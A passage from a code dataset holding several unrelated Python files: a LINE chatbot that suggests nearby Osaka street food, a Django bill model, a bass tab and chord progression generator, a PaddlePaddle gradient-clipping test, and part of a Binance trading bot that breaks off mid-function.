printFoodsInfo(restInfo):\n    hitCnt=countHit(restInfo)\n    Address=[]\n    Name=[]\n    for i in range(hitCnt):\n        if i==4:\n            break\n        if(restInfo['rest'][i]['address']):\n            Address.append(restInfo['rest'][i]['address'])\n            Name.append(restInfo['rest'][i]['name'])\n    return 
Address,Name\n\n@app.route(\"/\")\ndef hello_world():\n    return render_template('index.html')\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n    # get X-Line-Signature header value\n    signature = request.headers['X-Line-Signature']\n\n    # get request body as text\n    body = request.get_data(as_text=True)\n\n    # handle webhook body\n    try:\n        handler.handle(body, signature)\n    except InvalidSignatureError:\n        abort(400)\n\n    return 'OK'\n\n@handler.add(MessageEvent,message=LocationMessage)\ndef handle_location(event):\n    global wanna_eat \n    lat=event.message.latitude\n    lon=event.message.longitude\n    \n    questions=['たこ焼き','串カツ','お好み焼き','肉まん']\n    items=[QuickReplyButton(action=PostbackAction(label=f\"{question}\",data=f\"{question}\")) for question in questions]\n    orders=TextSendMessage(text=\"どれにする?\",quick_reply=QuickReply(items=items))\n    line_bot_api.push_message(event.source.user_id,messages=orders)\n    \n    try:\n        data=getFoodsInfo(wanna_eat,lat,lon)\n        Address,Name=printFoodsInfo(data)\n        carousel_template = CarouselTemplate(columns=[\n            CarouselColumn(text=f'場所:{place}', title=f'{name}', actions=[\n                PostbackAction(label='ありがとう。', data='ありがとう')\n            ]) for place,name in zip(Address,Name)])\n        template_message = TemplateSendMessage(\n            alt_text='Carousel alt text', template=carousel_template)\n        line_bot_api.push_message(event.source.user_id,template_message)\n    except:\n        line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっとよく分からんわ。'))\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n    questions=['お店','作り方','お土産','アメちゃん']\n    if(event.message.text=='おばちゃーん'):\n        items=[QuickReplyButton(action=PostbackAction(label=f\"{question}\",data=f\"{question}\")) for question in questions]\n        orders=TextSendMessage(text=\"どないしたん?\",quick_reply=QuickReply(items=items))\n        line_bot_api.reply_message(event.reply_token,messages=orders)\n\n    elif(event.message.text=='リスト'):\n        buttons_template = ButtonsTemplate(\n            title='My buttons sample',text='Hello, my buttons',thumbnail_image_url=\"https://denx.jp/wp-content/uploads/2018/04/cropped-DENXバナー2-1-1.png\",actions=[\n            URIAction(label='ホームページ', uri='https://denx.jp')\n            ])\n        template_message = TemplateSendMessage(alt_text='DENXサイト', template=buttons_template)\n        line_bot_api.reply_message(event.reply_token, template_message)\n\n# 以下の handler は、改良してより短く記述すべき。\n@handler.add(PostbackEvent)\ndef handler_postback(event):\n    global wanna_eat\n    text=event.postback.data\n    if text=='アメちゃん':\n        line_bot_api.reply_message(event.reply_token,ImageSendMessage(\n            original_content_url='https://1.bp.blogspot.com/-ZELov-QvHaU/UVWMfIiV3bI/AAAAAAAAPIM/xxWcxLdHrwk/s1600/candy.png',\n            preview_image_url='https://1.bp.blogspot.com/-ZELov-QvHaU/UVWMfIiV3bI/AAAAAAAAPIM/xxWcxLdHrwk/s1600/candy.png'\n        ))\n    elif text=='お土産':\n        souvenir=ButtonsTemplate(\n            text='お土産ならここやな', actions=[\n                URIAction(label='お土産', uri='line://app/1598486025-lMb5nvo4'),\n            ])\n        line_bot_api.reply_message(event.reply_token,TemplateSendMessage(alt_text='お土産',template=souvenir))\n    elif text=='作り方':\n        how_to_make=ButtonsTemplate(\n            text='このホームページ通りにやったらできるで。\\nしらんけど。', actions=[\n                URIAction(label='作り方', uri='https://cookpad.com/'),\n            ])\n        line_bot_api.reply_message(event.reply_token,TemplateSendMessage(alt_text='作り方',template=how_to_make))\n    \n    elif text=='お店':\n        #検索ボットを利用\n        restaurant=ButtonsTemplate(\n            text='今の場所から近いお店伝えるで。ええか?', actions=[\n                LocationAction(label='お願い'),\n            ])\n        template_message=TemplateSendMessage(alt_text='位置情報送信しますか?',template=restaurant)\n        
line_bot_api.reply_message(event.reply_token,template_message)\n #データの取得方法を探す。\n elif text=='串カツ':\n wanna_eat='串カツ'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='肉まん':\n wanna_eat='肉まん'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='お好み焼き':\n wanna_eat='お好み焼き'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='たこ焼き':\n wanna_eat='たこ焼き'\n line_bot_api.push_message(event.source.user_id,TextSendMessage(text='ごめん、ちょっと待ってな。'))\n elif text=='ありがとう':\n line_bot_api.reply_message(event.reply_token,TextSendMessage(text='おおきに')) \n\nif __name__ == \"__main__\":\n# app.run()\n port = int(os.getenv(\"PORT\"))\n app.run(host=\"0.0.0.0\", port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"164312100","text":"from django.db import models\nfrom plaid_cards.models import PlaidCard\n\n\nclass BillDue(models.Model):\n current_balance = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n blank=True,\n null=True\n )\n balance_due = models.DecimalField(\n max_digits=12,\n decimal_places=2,\n blank=True,\n null=True\n )\n due_date = models.DateTimeField(\n null=True,\n blank=True\n )\n mark_as_paid = models.BooleanField(\n default=False\n )\n paid_on = models.DateTimeField(\n null=True,\n blank=True\n )\n daily_status = models.BooleanField(\n default=False\n )\n start_bill = models.DateTimeField(\n null=True,\n blank=True\n )\n\n note = models.TextField(\n blank=True,\n null=True\n )\n plaid_card = models.ForeignKey(PlaidCard, related_name='bill_due')\n\n def __str__(self):\n return str(self.id)\n","sub_path":"debitize/debitize/bill_dues/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621163511","text":"turn = (\"Turnaround\",0,5,1,4)\r\ncircle = (\"Circle Progression\",5,1,4,0)\r\natebar = (\"Eight-bar Blues (Use 7th chords!)\",0,4,3,3,0,4,3,1,4)\r\ntwelver = (\"Twelve-bar Blues (Mix in some 7ths!)\",0,3,0,0,3,3,0,0,4,3,0,0)\r\nsprog = (\"Sensitive Female Progression\",5,3,0,4)\r\nfiddy = (\"50's progression (Doo-wop maybe?)\",0,5,3,4)\r\ntoofi = (\"ii-V-I (jazz harmony?)\",1,4,0)\r\ndict = {1:turn,\r\n\t\t2:circle,\r\n\t\t3:atebar,\r\n\t\t4:twelver,\r\n\t\t5:sprog,\r\n\t\t6:fiddy,\r\n\t\t7:toofi,}\r\noutfile=str(\"C:/Users/Yang55/Downloads/chords.txt\")\r\nimport random, csv, os\r\nprint(\"Enter a major or (m)inor chord to generate a circle of fifths progression, no flats and no need to label major chords!\")\r\nprint(\"ex: F#m, G#, and E are all valid forms. 
Gbma, Eb, and Cmaj are not valid forms.\")\r\nUinput = input(\"Write anything else for a randomized root note!\\n: \")\r\nprint(\"Enter the amount of chords you want in your progression!\\nEnter 0 to map the entire circle!\\nenter 1 to choose from a bank of common progressions!\")\r\nChordct = input(\"Write any non-int to have a randomly generated progression!\\n\")\r\ndef proggen(rootchr,chrct):\r\n\tMajor = ['A','A#','B','C','C#','D','D#','E','F','F#','G','G#']\r\n\tMinor = ['Am','A#m','Bm','Cm','C#m','Dm','D#m','Em','Fm','F#m','Gm','G#m']\r\n\tcfif=[0,2,4,5,7,9]\r\n\tcalt=[-12,-10,-8,-7,-5,-3]\r\n\tckeysval=[1,0,0,1,1,0]\r\n\tckeys=[\"Major\",\"Minor\",\"Minor\",\"Major\",\"Major\",\"Minor\"]\r\n\tnumchord = [\"I\",\"ii\",\"iii\",\"IV\",\"V\",\"vi\"]\r\n\ty=0\r\n\tls=[]\r\n\tresult=\"\"\r\n\ts = ' '\r\n\ttempkey=1\r\n\tprog=[]\r\n\ttry:\r\n\t\ttwrite=open(outfile, 'w')\r\n\texcept PermissionError:\r\n\t\tprint(\"looks like there was a permission error: please use administrator access in order to save a log file please!\")\r\n\r\n\tif rootchr in Major:\r\n\t\tfor x in range(0,11):\r\n\t\t\tif (Major[x] == rootchr):\r\n\t\t\t\trootchr = x\r\n\telif rootchr in Minor:\r\n\t\tfor x in range(0,11):\r\n\t\t\tif (Minor[x] == rootchr):\r\n\t\t\t\ttry:\r\n\t\t\t\t\trootchr = x + 3\r\n\t\t\t\texcept IndexError:\r\n\t\t\t\t\trootchr = x - 9\r\n\telse:\r\n\t\tprint(\"randomizing root note...\\n\")\r\n\t\ttwrite.write('root note randomized\\n')\r\n\t\trootchr=random.randint(0,11)\r\n\tfor x in range(0,6):\r\n\t\ttempnote=[]\r\n\t\ttry:\r\n\t\t\ttempnote.append(Major[rootchr+cfif[x]])\r\n\t\texcept (IndexError, TypeError):\r\n\t\t\ttempnote.append(Major[rootchr+calt[x]])\r\n\t\ttempnote.append(ckeys[x])\r\n\t\ttempnote.append(\"(\"+numchord[x]+\")\")\r\n\t\tresult = s.join(tempnote)\r\n\t\tls.append(result)\r\n\ttry:\r\n\t\tint(chrct)\r\n\texcept (ValueError, TypeError):\r\n\t\tprint('randomizing chord count...')\r\n\t\ttwrite.write('chord count randomized\\n')\r\n\t\tchrct = random.randint(3,10)\r\n\tif int(chrct) > 1:\r\n\t\tfor n in range (1,int(chrct)):\r\n\t\t\tprog.append(ls[random.randint(0,5)])\r\n\telif int(chrct) == 1:\r\n\t\ttemprand = random.randint(1,3)\r\n\t\tprint((dict[temprand])[0])\r\n\t\ttwrite.write((dict[temprand])[0]+'\\n')\r\n\t\tfor n in range(1,len(dict[temprand])):\r\n\t\t\tprog.append(ls[(dict[temprand])[n]])\r\n\telif int(chrct) < 1:\r\n\t\tfor n in range (0,6):\r\n\t\t\tprog.append(ls[n])\r\n\tprint ('[%s]' % ', '.join(map(str, prog)))\r\n\ttwrite.write('[%s]' % ', '.join(map(str, prog))+'\\n')\r\n\ttwrite.close()\r\n\treturn prog\r\n\t\r\ndef scalegen(prog):\r\n\t\r\n\tsemitone = ['A','A#/Bb','B','C','C#/Db','D','D#/Eb','E','F','F#/Gb','G','G#/Ab']\r\n\tmajmod = [0,2,4,5,7,9,11]\r\n\tmajalt = [0,-10,-8,-7,-5,-3,-1]\r\n\tminmod = [0,2,3,5,7,8,10]\r\n\tminalt = [0,-10,-9,-7,-5,-4,-2]\r\n\tTonic=''\r\n\tSupertonic=''\r\n\tMediant=''\r\n\tSubdominant=''\r\n\tDominant=''\r\n\tSupermediant=''\r\n\tLeading=''\r\n\ttempscale=[]\r\n\tkeys = {1:majmod,\r\n\t\t\t2:majalt,\r\n\t\t\t3:minmod,\r\n\t\t\t4:minalt}\r\n\tdegrees = {\t0:Tonic,\r\n\t\t\t\t1:Supertonic,\r\n\t\t\t\t2:Mediant,\r\n\t\t\t\t3:Subdominant,\r\n\t\t\t\t4:Dominant,\r\n\t\t\t\t5:Supermediant,\r\n\t\t\t\t6:Leading\t}\r\n\tfor x in range(0,len(prog)):\r\n\t\ttry:\r\n\t\t\ttwrite=open(outfile, 'a')\r\n\t\texcept PermissionError:\r\n\t\t\tprint(\"looks like there was a permission error: please use administrator access in order to save a log file 
please!\")\r\n\t\ttwrite.write(prog[x]+'\\n')\r\n\t\ttempscale=[]\r\n\t\tif (\"Major\" in prog[x]):\r\n\t\t\tk = 1\r\n\t\telif (\"Minor\" in prog[x]):\r\n\t\t\tk = 3\r\n\t\tfor n in range(0,11):\r\n\t\t\tif (semitone[n] == (prog[x])[:1]):\r\n\t\t\t\troot = n\r\n\t\t\t\tif \"#\" in semitone[n]:\r\n\t\t\t\t\troot += 1\r\n\t\t\t\tfor j in range (0,6):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tdegrees[j] = semitone[root + (keys[k])[j]]\t\r\n\t\t\t\t\texcept IndexError:\r\n\t\t\t\t\t\tk = k+1\r\n\t\t\t\t\t\tdegrees[j] = semitone[root + (keys[k])[j]]\r\n\t\t\t\t\ttempscale.append(degrees[j])\r\n\t\tprint (\"the following scale is in the key of \"+prog[x]+\":\")\r\n\t\tprint ('[%s]' % ', '.join(map(str, tempscale)))\r\n\t\tdef basstranscribe(scalels):\r\n\t\t\tsemitone = ['A','A#/Bb','B','C','C#/Db','D','D#/Eb','E','F','F#/Gb','G','G#/Ab']\r\n\t\t\tEstring = 7\r\n\t\t\tAstring = 0\r\n\t\t\tDstring = 5\r\n\t\t\tGstring = 10\r\n\t\t\ttnote = 0\r\n\t\t\tchordbox = []\r\n\t\t\tGls=[]\r\n\t\t\tDls=[]\r\n\t\t\tAls=[]\r\n\t\t\tEls=[]\r\n\t\t\tstringmaps = (\"\",\"G String\", \"D String\", \"A String\", \"E String\")\r\n\t\t\tstrings ={\t1:Gstring,\r\n\t\t\t\t\t\t2:Dstring,\r\n\t\t\t\t\t\t3:Astring,\r\n\t\t\t\t\t\t4:Estring}\r\n\t\t\tstls={\t1:Gls,\r\n\t\t\t\t\t2:Dls,\r\n\t\t\t\t\t3:Als,\r\n\t\t\t\t\t4:Els}\r\n\t\t\tfor note in scalels:\r\n\t\t\t\tGls=[]\r\n\t\t\t\tDls=[]\r\n\t\t\t\tAls=[]\r\n\t\t\t\tEls=[]\r\n\t\t\t\tfor notenum in range(0,len(semitone)):\r\n\t\t\t\t\tif (semitone[notenum] == note):\r\n\t\t\t\t\t\ttnote = notenum\r\n\t\t\t\t\t\tprint(\"for the note \"+ note +\",\")\r\n\t\t\t\t\t\tfor string in range (1,5):\t\t\t#if you're partial to not hitting some bass strings..\r\n\t\t\t\t\t\t\tchordbox=[]\r\n\t\t\t\t\t\t\tfor x in range (0,24):\t\t#change the range to choose preferences (ie playing on the neck)\r\n\t\t\t\t\t\t\t\tif (((strings[string] + x)%12)==tnote):\r\n\t\t\t\t\t\t\t\t\tchordbox.append(x)\r\n\t\t\t\t\t\t\t\t\tstls[string].append(x)\r\n\t\t\t\t\t\t\t\t\tstls[string].sort()\r\n\t\t\t\t\t\t\tprint(\"on the \"+stringmaps[string]+\", you can play:\"+('[%s]' % ', '.join(map(str, chordbox))))\r\n\t\t\ttwrite.write(\"G \"+('[%s]' % ', '.join(map(str, stls[1])))+'\\n'+\"D \"+('[%s]' % ', '.join(map(str, stls[2])))+'\\n'+\"A \"+('[%s]' % ', '.join(map(str, stls[3])))+'\\n'+\"E \"+('[%s]' % ', '.join(map(str, stls[4])))+'\\n\\n')\r\n\t\t\ttwrite.close()\r\n\t\tbasstranscribe(tempscale)\t\r\nprog = proggen(Uinput,Chordct)\r\nscalegen(prog)\r\n","sub_path":"shitty bass tab generator.py","file_name":"shitty bass tab generator.py","file_ext":"py","file_size_in_byte":5801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384446662","text":"# Copyright (c) 2022 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport unittest\n\n\nclass TestGradientClip(unittest.TestCase):\n def test_dp2(self):\n file_dir = os.path.dirname(os.path.abspath(__file__))\n launch_model_path = os.path.join(\n file_dir, \"clip_grad_by_global_norm.py\"\n )\n\n if os.environ.get(\"WITH_COVERAGE\", \"OFF\") == \"ON\":\n coverage_args = [\"-m\", \"coverage\", \"run\", \"--branch\", \"-p\"]\n else:\n coverage_args = []\n\n tmp_dir = tempfile.TemporaryDirectory()\n cmd = (\n [sys.executable, \"-u\"]\n + coverage_args\n + [\n \"-m\",\n \"paddle.distributed.launch\",\n \"--devices\",\n \"0,1\",\n \"--log_dir\",\n tmp_dir.name,\n launch_model_path,\n ]\n )\n\n process = subprocess.Popen(cmd)\n process.wait()\n self.assertEqual(process.returncode, 0)\n\n tmp_dir.cleanup()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/auto_parallel/test_pass_grad_clip.py","file_name":"test_pass_grad_clip.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73133319","text":"import configparser\nfrom TechnicalAnalysis import OHLC\nfrom TechnicalAnalysis import Indicators\nfrom TechnicalAnalysis import MFISignal\nfrom datetime import datetime\nfrom Portfolio import Transaction\nimport time\nfrom Binance import BinacePublic, BinancePrivate\nimport pathlib\nimport json\nimport logging\nimport os\nimport threading\nfrom plyer import notification\n#from MessageQueue import MQManager, MQExchange, MQProducer\nfrom Constants import Constants\n\nBOT_TYPE_MFI = \"MFI\"\nBOT_TYPE_STDEV = \"STDEV\"\n\n\nclass decision_logEntry:\n def __init__(self, current_price, decision, msg):\n self.decision_time = datetime.utcnow()\n self.current_price = current_price\n self.decision = decision\n self.msg = msg\n\n\nclass TradingBot(threading.Thread):\n\n def __init__(self, dict):\n threading.Thread.__init__(self)\n logging.debug(\"inside TradingBot>Constructor\")\n self.loadFromBotConfig(dict)\n self.previous_mfi = None\n self.dict_transaction_log = {}\n self.decision_log = []\n self.loadFromBotConfig(dict)\n #self.loadFromDictionary(dict)\n self.last_buy_open_time = None\n self.save()\n\n def loadFromBotConfig(self,dict):\n self.type = dict[\"type\"]\n self.base_symbol = dict[\"base_symbol\"]\n self.quote_symbol = dict[\"quote_symbol\"]\n self.interval = dict[\"interval\"]\n self.initial_amount = float(dict[\"initial_amount\"])\n self.stop_loss = float(dict[\"stop_loss\"])\n self.take_profit = float(dict[\"take_profit\"])\n self.trailing_Stop_loss = float(dict[\"trailing_stop_loss\"])\n self.id = \"{}_{}{}_{}\".format(self.type, self.base_symbol, self.quote_symbol, self.interval)\n self.pair = self.base_symbol + self.quote_symbol\n\n def loadFromDictionary(self, dict):\n # Set values from parameters\n #self.type = dict[\"type\"]\n #self.base_symbol = dict[\"base_symbol\"]\n #self.quote_symbol = dict[\"quote_symbol\"]\n 
\n #self.interval = dict[\"interval\"]\n #self.initial_amount = float(dict[\"initial_amount\"])\n #self.stop_loss = float(dict[\"stop_loss\"])\n #self.take_profit = float(dict[\"take_profit\"])\n #self.trailing_Stop_loss = float(dict[\"trailing_stop_loss\"])\n #self.id = \"{}_{}{}_{}\".format(self.type, self.base_symbol, self.quote_symbol, self.interval)\n #self.pair = self.base_symbol + self.quote_symbol\n\n self.base_quantity = None\n self.current_price = None\n self.previous_price = None\n\n self.current_amount = float(self.initial_amount)\n if \"current_amount\" in dict.keys():\n self.current_amount = dict[\"current_amount\"]\n\n if \"base_quantity\" in dict.keys() and dict[\"base_quantity\"] is not None:\n self.base_quantity = float(dict[\"base_quantity\"])\n\n if \"current_price\" in dict.keys() and dict[\"current_price\"] is not None:\n self.current_price = float(dict[\"current_price\"])\n\n if \"previous_price\" in dict.keys() and dict[\"previous_price\"] is not None:\n self.previous_price = float(dict[\"previous_price\"])\n\n # Selling attrubutes\n self.trailing_stop_loss_enabled = None\n self.current_stop_loss_price = None\n self.current_take_profit_price = None\n if \"trailing_stop_loss_enabled\" in dict.keys() and dict[\"trailing_stop_loss_enabled\"] is not None:\n self.trailing_stop_loss_enabled = bool(dict[\"trailing_stop_loss_enabled\"])\n\n if \"current_stop_loss_price\" in dict.keys() and dict[\"current_stop_loss_price\"] is not None:\n self.current_stop_loss_price = float(dict[\"current_stop_loss_price\"])\n\n if \"current_take_profit_price\" in dict.keys() and dict[\"current_take_profit_price\"] is not None:\n self.current_take_profit_price = float(dict[\"current_take_profit_price\"])\n\n # Indicators\n self.current_mfi = None\n self.current_stdev = None\n self.current_mean = None\n self.previous_mfi = None\n\n if \"current_mfi\" in dict.keys() and dict[\"current_mfi\"] is not None:\n self.current_mfi = float(dict[\"current_mfi\"])\n\n if \"current_stdev\" in dict.keys() and dict[\"current_stdev\"] is not None:\n self.current_stdev = float(dict[\"current_stdev\"])\n\n if \"current_mean\" in dict.keys() and dict[\"current_mean\"] is not None:\n self.current_mean = float(dict[\"current_mean\"])\n\n # Status\n self.is_active = False\n self.status = \"SEARCHING\"\n\n if \"is_active\" in dict.keys() and dict[\"is_active\"] is not None:\n self.is_active = bool(dict[\"is_active\"])\n\n if \"status\" in dict.keys() and dict[\"status\"] is not None:\n self.status = dict[\"status\"]\n\n self.current_transaction = None\n if \"current_transaction\" in dict.keys():\n trans = Transaction()\n trans.loadFromDictionary(dict[\"current_transaction\"])\n self.current_transaction = trans\n\n # TODO : Load transaction log\n try:\n if \"transaction_log\" in dict.keys():\n for k,d in dict[\"transaction_log\"].items():\n self.dict_transaction_log[k] = d\n except:\n self.logger(\"error occured while loading transaction log\")\n\n\n # If no transaction is open then set status to SEARCHING\n if self.current_transaction is None:\n self.status = \"SEARCHING\"\n\n b = BinacePublic()\n # self.updatePrice(b.getAveragePrice(self.pair))\n self.updatePrice(b.getLatestPrice(self.pair))\n\n self.log_file_name = \"\"\n self.logger = logging.getLogger(self.id)\n self.setLogger()\n self.save_file_path = os.path.join(\"Database\",\"bots_state\", self.id + \".json\")\n self.active_file_path = os.path.join(\"Database\",\"bots_active\" , self.id + \".top\")\n\n def sendHeartBeat(self):\n\n try:\n\n msg_dict = {}\n 
msg_dict[\"id\"] = self.id\n msg_dict[\"pair\"] = self.pair\n msg_dict[\"interval\"] = self.interval\n msg_dict[\"bot_type\"] = self.type\n msg_dict[\"status\"] = self.status\n msg_dict[\"time\"] = datetime.now().strftime(Constants.STANDARD_DATE_FORMAT)\n msg_dict[\"current_price\"] = round(self.current_price, 4)\n msg_dict[\"current_amount\"] = round(self.current_amount, 4)\n indicators_info = {}\n if self.type == \"MFI\" and self.current_mfi is not None:\n indicators_info[\"current_mfi\"] = round(self.current_mfi, 4)\n\n if self.type == \"STDEV\" and self.current_mean is not None:\n indicators_info[\"current_mean\"] = round(self.current_mean, 4)\n indicators_info[\"current_stdev\"] = round(self.current_stdev, 4)\n threshold_price = self.current_mean - 2.25 * self.current_stdev\n indicators_info[\"threshold_price\"] = round(threshold_price, 4)\n indicators_info[\"threshold_gain\"] = round(\n ((self.current_price - threshold_price) / (self.current_mean - threshold_price)) * 100, 4)\n\n if indicators_info:\n msg_dict[\"indicators_info\"] = indicators_info\n\n producer.postMessage(\"heart_beat\", msg_dict)\n except:\n self.logger.exception(\"Error occured in TradingBot>sendheartBeat()\")\n\n def sendCurrentTransaction(self):\n try:\n\n if self.current_transaction is not None:\n PATH = \"C:\\\\Users\\\\171802\\\\PycharmProjects\\\\Binance\\\\venv\\\\MessageQueue\"\n mq = MQManager(PATH)\n exchange = mq.getExchange(\"Binance\")\n producer = exchange.getProducer()\n msg_dict = self.current_transaction.getDictionary()\n producer.postMessage(\"Transactions\", msg_dict)\n\n except:\n self.logger.exception(\"Error occured in TradingBot>sendCurrentTransaction()\")\n\n def loadFromJsonFile(self):\n try:\n # Leave if file does not exist\n if not os.path.isfile(self.save_file_path):\n self.logger.info(\"Save stat file not found\")\n return\n\n self.logger.info(\"Save stat file found, loading information from file\")\n dict = {}\n with open(self.save_file_path) as config_file:\n dict = json.load(config_file)\n\n if dict is None:\n return\n\n self.loadFromDictionary(dict)\n self.logger.info(\"Information loaded from save state file\")\n except:\n self.logger.exception(\"Error occured in TradigBot>loadFromJsonFile\")\n\n def setLogger(self):\n self.log_file_name = os.path.join(\"Logs\", self.id + \".txt\")\n self.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n file_handler = logging.FileHandler(self.log_file_name)\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n self.logger.addHandler(file_handler)\n\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.DEBUG)\n stream_handler.setFormatter(formatter)\n self.logger.addHandler(stream_handler)\n\n # logging.basicConfig(filename=self.log_file_name,\n # level=logging.DEBUG,format='%(asctime)s %(levelname)s %(message)s')\n\n def stop(self):\n self.is_active = False\n self.save()\n self.deleteActiveFile()\n\n def run(self):\n try:\n print(\"Inside TradingBot>run\")\n self.createActiveFile()\n # self.publishToDesktop(self.id , \"Bot started\")\n self.logger.debug(\"Inside TradingBot>run\")\n self.save()\n if self.is_active == False:\n self.logger.info(\"Bot is inactive\")\n return\n\n while self.is_active == True:\n self.save()\n\n # Check if active file is present\n\n # When status is Searching - this function will call checkForBuy at specific interval\n # If MFI is more than 30 then check status every 5 mins to reduce log and unnecessary requests\n\n 
if self.type == \"MFI\" and self.status == \"SEARCHING\":\n self.checkForBuy_MFI()\n self.logger.info(\n self.id + \"Current status:{}, Price:{}, MFI:{}\".format(self.status, str(self.current_price),\n str(self.current_mfi)))\n time.sleep(120)\n\n elif self.type == \"MFI\" and self.status == \"BUY_WATCH\":\n self.checkForBuy_MFI()\n time.sleep(60)\n\n elif self.type == \"STDEV\" and self.status == \"SEARCHING\":\n\n self.checkForBuy_STDEV()\n self.logger.info(\n self.id + \"Current status:{}, Price:{}, Mean:{}, STDEV:{},Lower BB Band:{}\".format(self.status,\n str(\n self.current_price),\n str(\n self.current_mean),\n str(\n self.current_stdev),\n str(\n self.current_mean - 2 * self.current_stdev)))\n time.sleep(180)\n\n elif self.type == \"STDEV\" and self.status == \"BUY_WATCH\":\n\n self.checkForBuy_STDEV()\n self.logger.info(\n self.id + \"Current status:{}, Price:{}, Mean:{}, STDEV:{},Lower BB Band:{}\".format(\n self.status, str(self.current_price),\n str(self.current_mean), str(self.current_stdev),\n str(self.current_mean - 2 * self.current_stdev)))\n time.sleep(30)\n\n elif self.type == \"MA\" and self.status == \"SEARCHING\":\n self.checkForBuy_MA()\n time.sleep(30)\n\n # When status is Open -- this function will call check ForSale at specific interval\n elif self.status == \"OPEN\":\n self.checkforSell()\n\n # Send to Message Queue\n #self.sendCurrentTransaction()\n\n time.sleep(15)\n except:\n self.logger.exception(\"Error occured in TradingBot>Run\")\n\n def checkForBuy_MA(self):\n try:\n self.logger.debug(\"Inside TradingBot>checkForBuy_MA\")\n # Fetch candle stick data fron Binance API\n binance = BinacePublic()\n lst_candles = binance.getKlineCandles(self.pair, self.interval, None, None, 25)\n\n if self.last_buy_open_time is not None and self.last_buy_open_time == lst_candles[-1].openTime:\n self.logger.info(\"Coin was bought recently hence skipping\")\n return\n\n # Convert to list of standard OHLC\n lstOHLC = []\n for candle in lst_candles:\n ohlc = candle.ohlc\n lstOHLC.append(ohlc)\n\n lstOHLC2 = lstOHLC.copy()\n\n # Get MFI signal\n tc = Indicators()\n lstOHLC19 = tc.getMFI(lstOHLC, 19)\n #lstOHLC19.reverse()\n ma19_current = lstOHLC19[-1].mean\n ma19_previous = lstOHLC19[-2].mean\n\n lstOHLC13 = tc.getMFI(lstOHLC2, 13)\n #lstOHLC13.reverse()\n ma13_current = lstOHLC13[-1].mean\n ma13_previous = lstOHLC13[-2].mean\n # Update current price\n\n self.updatePrice(lstOHLC13[-1].close)\n if lstOHLC19[0].stdev == 0:\n s = 0\n else:\n s = (ma13_current - lstOHLC13[0].close) / lstOHLC13[0].stdev\n\n self.logger.info(\n self.id + \" Current MA13:\" + str(ma13_current) + \",MA19:\" + str(ma19_current)+\"MA19 price:\"+str(lstOHLC19[-1].close))\n if self.status == \"SEARCHING\":\n # MA 13 cross over MA 19 and value is not beyond upper limit of bollinger band\n if ma13_current > ma19_current and ma13_previous < ma19_previous and s > -1.5:\n self.buy(\"MA13 crossed MA19\")\n self.last_buy_open_time = lst_candles[-1].openTime\n\n\n\n\n except:\n self.logger.exception(\"Error occured in TradingBot>CheckForBuy_MA\")\n\n def checkForBuy_MFI(self):\n try:\n self.logger.debug(\"Inside TradingBot>CheckForBuy_MFI\")\n\n # Fetch candle stick data fron Binance API\n binance = BinacePublic()\n lst_candles = binance.getKlineCandles(self.pair, self.interval, None, None, 20)\n\n # Convert to list of standard OHLC\n lstOHLC = []\n for candle in lst_candles:\n ohlc = candle.ohlc\n lstOHLC.append(ohlc)\n\n # Get MFI signal\n tc = Indicators()\n lstOHLC = tc.getMFI(lstOHLC, 7)\n lstOHLC.reverse()\n now 
= datetime.now()\n\n # Update current and previous MFI prices\n if self.current_mfi is not None:\n self.previous_mfi = self.current_mfi\n\n self.current_mfi = lstOHLC[0].mfi\n if self.previous_mfi is None:\n self.previous_mfi = lstOHLC[1].mfi\n\n sig = MFISignal(now, self.previous_mfi, self.current_mfi, lstOHLC[0].close)\n self.logger.info(\n self.id + \" Current MFI:\" + str(self.current_mfi) + \",Previous MFI\" + str(self.previous_mfi))\n self.updatePrice(lstOHLC[0].close)\n\n if self.status == \"SEARCHING\" and self.current_mfi < 18:\n self.status = \"BUY_WATCH\"\n self.logger.info(\"Status changed to BUY_WATCH, current MFI:{}\".format(str(self.current_mfi)))\n return\n\n if self.status == \"BUY_WATCH\" and self.previous_mfi == 0.0 and self.current_mfi > 2:\n self.buy(\"MFI changed from ZERO to positive value\")\n\n # elif self.status == \"BUY_WATCH\" and sig.signalType == \"OVERSOLD-NORMAL\":\n elif self.status == \"BUY_WATCH\" and self.current_mfi > 20.0:\n self.buy(\"MFI signal:\" + sig.signalType)\n\n elif self.status == \"BUY_WATCH\" and self.current_mfi > 30.0:\n self.status = \"SEARCHING\"\n\n except:\n self.logger.exception(\"Error occured in TradingBot>CheckForBuy_MFI\")\n\n def checkForBuy_STDEV(self):\n try:\n self.logger.debug(\"Inside TradingBot>checkForBuy_SDEV\")\n # Fetch candle stick data fron Binance API\n binance = 